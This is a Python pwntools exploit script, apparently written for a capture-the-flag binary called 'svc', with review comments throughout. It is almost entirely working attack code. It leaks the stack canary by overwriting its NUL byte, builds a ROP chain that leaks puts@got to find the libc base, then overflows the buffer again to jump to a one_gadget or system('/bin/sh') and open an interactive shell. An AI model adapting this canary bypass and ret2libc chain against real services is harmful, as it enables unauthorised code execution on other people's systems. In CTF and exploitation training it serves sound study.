#!/usr/bin/python3.7
from pwn import *

# --- target / environment setup --------------------------------------------
# Alternative split-pane terminal for gdb.debug(): ['tmux', 'splitw', '-h']
context.terminal = ['/usr/bin/tilix', '-a', 'session-add-right', '-e']
context.arch = 'amd64'
context.bits = 64

chal = './svc'
# NOTE(review): the *local* system libc is used for every libc-relative
# value below (puts, system, "/bin/sh" and the one_gadget constant), so the
# chain only lands on a target running this exact libc build.  Point this at
# the target's libc when going remote.
libc = '/lib/x86_64-linux-gnu/libc.so.6'

# Break right before the overwritten return fires.  The fixed 0x400xxx
# addresses used throughout assume a non-PIE binary (confirm with checksec).
gdbscript = """br * 0x400ddf
c
"""

# Run the binary under gdb from the very first instruction.  To attach to an
# already running process instead: p = process(chal); gdb.attach(p, gdbscript)
p = gdb.debug(chal, gdbscript)
e = ELF(chal)
l = ELF(libc)
def feed(food):
    """Menu option 1: send *food* as the buffer contents.

    Both messages go out via sendlineafter, so pwntools appends a '\\n' after
    *food* -- the canary leak below relies on that extra byte.
    """
    for msg in ('1', food):
        p.sendlineafter('>>', msg)
def review():
    """Menu option 2: make the program print the buffer back.

    Returns the raw bytes between the two banner lines; note the trailing
    banner (the '----' line and the 'SCV GOOD TO GO' line) is included in
    the returned value, so callers split on '\\n' rather than use it whole.
    """
    p.sendlineafter('>>', '2')
    head = '[*]PLEASE TREAT HIM WELL.....\n-------------------------\n'
    tail = '-------------------------\n[*]SCV GOOD TO GO,SIR....\n'
    p.recvuntil(head)
    return p.recvuntil(tail)
def mine():
    """Menu option 3, then discard one reply line.

    Presumably this is the option that returns from the vulnerable frame and
    so fires whatever return address the last feed() wrote -- the script
    calls it right after every overflow.
    """
    p.sendlineafter('>>', '3')
    p.recvline()
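# Stage 0: leak the stack canary.  sendline() appends '\n' after the 168
# filler bytes, which lands on the canary's low (NUL) byte; the subsequent
# print therefore runs through the remaining seven canary bytes instead of
# stopping at the terminator.
feed(b'A' * 168)
# Everything after the injected '\n' starts with the 7 upper canary bytes.
canary_tail = review().split(b'\n')[1][:7]
# The split assumes none of those seven bytes is 0x0a.  If one is, the
# leak is truncated and every later stage would corrupt the canary and
# die with a stack-smashing abort -- fail here with a clear message instead.
if len(canary_tail) != 7:
    log.error('canary leak truncated: got %d bytes %r (retry, a 0x0a byte '
              'in the canary breaks the newline trick)' % (len(canary_tail), canary_tail))
canary = b'\x00' + canary_tail
log.info('leaked canary: ')
log.info(canary)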
# Gadget kept for a hand-rolled chain:  0x400ea3: pop rdi; ret
poprdi = 0x400ea3

# Stage 1 chain: puts(puts@got) leaks a libc address, then re-enter main
# (0x400a96) so a second overflow can be sent.  Hand-rolled equivalent:
#   p64(poprdi) + p64(e.got['puts']) + p64(e.symbols['puts']) + p64(0x400a96)
leak_chain = ROP(e)
leak_chain.puts(e.got['puts'])
leak_chain.call(0x400a96)
log.info(leak_chain.dump())
rop = leak_chain.chain()
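# Stage 1: overflow with the leak chain and trigger the return.
# Frame layout: 168 filler bytes | 8-byte canary | 8-byte saved rbp | chain.
feed(b'A' * 168 + canary + b'CCCCCCCC' + rop)
mine()

# puts() prints the GOT entry up to its first NUL byte, so for a userland
# address we typically get 6 bytes followed by the '\n' puts adds.
putsleak = p.recvline()[:-1]
log.info('Puts Leak:')
log.info(putsleak)
# Guard the unpack: an empty line would silently become address 0 and more
# than 8 bytes means we are not looking at the leak at all.
if not 0 < len(putsleak) <= 8:
    log.error('unexpected puts leak length %d: %r' % (len(putsleak), putsleak))
putsleak = u64(putsleak.ljust(8, b'\x00'))

# Derive every libc-relative value from a single base so a wrong libc shows
# up in one place.
libcbase = putsleak - l.symbols['puts']
# A libc base is page aligned; anything else means the leak was misparsed
# or the local libc (path at the top of the script) is not the target's.
if libcbase & 0xfff:
    log.error('libc base 0x%x is not page aligned -- wrong libc or bad leak' % libcbase)
system = libcbase + l.symbols['system']
binsh = libcbase + next(l.search(b'/bin/sh\x00'))
# one_gadget offset for the local libc build only; regenerate it
# (`one_gadget <libc>`) for any other libc and re-check its constraints.
oneg = libcbase + 0x10afa9
log.info('system:')
log.info(hex(system))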
# Stage 2 chain (alternative): system("/bin/sh") built against the rebased
# libc.  It is only logged; the payload actually sent returns straight into
# the one_gadget.  NOTE(review): the hand-rolled pop rdi / binsh / system
# chain was reported as "not working" -- a classic cause on recent glibc is a
# misaligned stack at the system() call (movaps), fixed by inserting a plain
# `ret` gadget before it; verify in gdb before relying on either chain.
l.address = libcbase
shell_chain = ROP(l)
shell_chain.system(next(l.search(b'/bin/sh\x00')))
log.info(shell_chain.dump())
rop = shell_chain.chain()

# Same frame layout as the leak stage.  To try the system() chain instead,
# replace p64(oneg) with rop.
payload = b'A' * 168 + canary + b'CCCCCCCC' + p64(oneg)
feed(payload)
mine()
p.interactive()